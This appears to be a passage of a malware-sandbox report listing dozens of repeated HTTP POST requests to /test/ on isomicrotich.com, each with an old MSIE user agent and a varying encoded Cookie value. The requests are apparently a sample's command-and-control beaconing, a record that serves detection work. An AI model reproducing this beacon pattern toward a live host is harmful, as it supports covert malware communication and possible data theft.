                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
